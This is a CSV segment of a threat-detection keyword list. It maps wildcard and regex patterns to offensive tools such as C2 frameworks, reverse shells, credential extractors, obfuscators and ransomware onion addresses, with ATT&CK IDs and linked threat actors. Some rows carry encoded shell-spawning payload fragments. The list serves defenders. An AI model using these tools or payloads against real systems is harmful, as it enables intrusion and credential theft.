"*PayloadCommsHost*",".{0,1000}PayloadCommsHost.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","54538"
"*--payload-cookie*",".{0,1000}\-\-payload\-cookie.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","54539"
"*Payload-Download-Cradles*",".{0,1000}Payload\-Download\-Cradles.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","54540"
"*PayloadFormat.ASSEMBLY*",".{0,1000}PayloadFormat\.ASSEMBLY.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54541"
"*PayloadFormat.DLL*",".{0,1000}PayloadFormat\.DLL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54542"
"*PayloadFormat.EXE*",".{0,1000}PayloadFormat\.EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54543"
"*PayloadFormat.POWERSHELL*",".{0,1000}PayloadFormat\.POWERSHELL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54544"
"*PayloadFormat.SHELLCODE*",".{0,1000}PayloadFormat\.SHELLCODE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54545"
"*PayloadFormat.SVC_EXE*",".{0,1000}PayloadFormat\.SVC_EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54546"
"*PayloadGen v2.0 - by @JoelGMSec*",".{0,1000}PayloadGen\sv2\.0\s\-\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","54547"
"*payloadgenerator.py*",".{0,1000}payloadgenerator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54548"
"*Payload-Generator/trix-back-gen.zip*",".{0,1000}Payload\-Generator\/trix\-back\-gen\.zip.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","54549"
"*payloads/Follina*",".{0,1000}payloads\/Follina.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","54550"
"*payloads/Powershell*",".{0,1000}payloads\/Powershell.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","54551"
"*payloads/shellcodes*",".{0,1000}payloads\/shellcodes.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","54552"
"*payloads\payloadx64.bin*",".{0,1000}payloads\\payloadx64\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","54553"
"*payloads\payloadx86.bin*",".{0,1000}payloads\\payloadx86\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","54554"
"*payloads_examples*calc.js*",".{0,1000}payloads_examples.{0,1000}calc\.js.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","54555"
"*payloads_examples*calc.xll*",".{0,1000}payloads_examples.{0,1000}calc\.xll.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","54556"
"*PayloadsAllTheThings*",".{0,1000}PayloadsAllTheThings.{0,1000}","offensive_tool_keyword","PayloadsAllTheThings","A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! ","T1210 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Bo0oM/PayloadsAllTheThings","1","1","N/A","N/A","N/A","1","3","4","2019-02-11T06:34:14Z","2019-02-11T06:29:45Z","54557"
"*PayloadService.*",".{0,1000}PayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54558"
"*--payload-type Macro*",".{0,1000}\-\-payload\-type\sMacro.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","54559"
"*PayloadType.BIND_PIPE*",".{0,1000}PayloadType\.BIND_PIPE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54560"
"*PayloadType.EXTERNAL*",".{0,1000}PayloadType\.EXTERNAL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54561"
"*PayloadType.HTTP*",".{0,1000}PayloadType\.HTTP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54562"
"*PayloadType.REVERSE_TCP*",".{0,1000}PayloadType\.REVERSE_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54563"
"*--payload-url */pwn.html",".{0,1000}\-\-payload\-url\s.{0,1000}\/pwn\.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","54564"
"*payorgz3j6hs2gj66nk6omfw65atgmqwzxqbbxnqi3bv2mlwgcirunad.onion*",".{0,1000}payorgz3j6hs2gj66nk6omfw65atgmqwzxqbbxnqi3bv2mlwgcirunad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54566"
"*pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did.onion*",".{0,1000}pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54567"
"*pc_ip = Invoke-WebRequest -Uri ""https://api.ipify.org"" -UseBasicParsing*",".{0,1000}pc_ip\s\=\sInvoke\-WebRequest\s\-Uri\s\""https\:\/\/api\.ipify\.org\""\s\-UseBasicParsing.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","54569"
"*pcap_linktypes.py*",".{0,1000}pcap_linktypes\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54570"
"*pcap2john.py*",".{0,1000}pcap2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54571"
"*pcapfile.py*",".{0,1000}pcapfile\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54572"
"*PcapXray*",".{0,1000}PcapXray.{0,1000}","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","N/A","10","1717","281","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z","54573"
"*Pcredz -d *",".{0,1000}Pcredz\s\-d\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","54592"
"*Pcredz -f *",".{0,1000}Pcredz\s\-f\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","54593"
"*PCredz -f *.pcap*",".{0,1000}PCredz\s\-f\s.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54594"
"*Pcredz -i *",".{0,1000}Pcredz\s\-i\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","54595"
"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*",".{0,1000}PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","54597"
"*PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8*",".{0,1000}PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","54598"
"*pdadjkfkgcafgbceimcpbkalnfnepbnk*",".{0,1000}pdadjkfkgcafgbceimcpbkalnfnepbnk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","54599"
"*PDF_Payload*Doomfist.pdf*",".{0,1000}PDF_Payload.{0,1000}Doomfist\.pdf.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","54602"
"*pdf2john.pl*",".{0,1000}pdf2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54603"
"*pdfcrack -f *.pdf*",".{0,1000}pdfcrack\s\-f\s.{0,1000}\.pdf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54604"
"*pdf-exploit-main.zip*",".{0,1000}pdf\-exploit\-main\.zip.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","1","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","54605"
"*PDONUT_INSTANCE*",".{0,1000}PDONUT_INSTANCE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","54606"
"*pe_inject.rb*",".{0,1000}pe_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54607"
"*pe_packer/dll_main.c*",".{0,1000}pe_packer\/dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54608"
"*pe_packer/exe_main.c*",".{0,1000}pe_packer\/exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54609"
"*pe_packer/main.c*",".{0,1000}pe_packer\/main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54610"
"*pe_packer\dll_main.c*",".{0,1000}pe_packer\\dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54611"
"*pe_packer\exe_main.c*",".{0,1000}pe_packer\\exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54612"
"*pe_packer\main.c*",".{0,1000}pe_packer\\main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54613"
"*pe_packer_exe.exe*",".{0,1000}pe_packer_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54614"
"*pe2sh.exe*",".{0,1000}pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","54615"
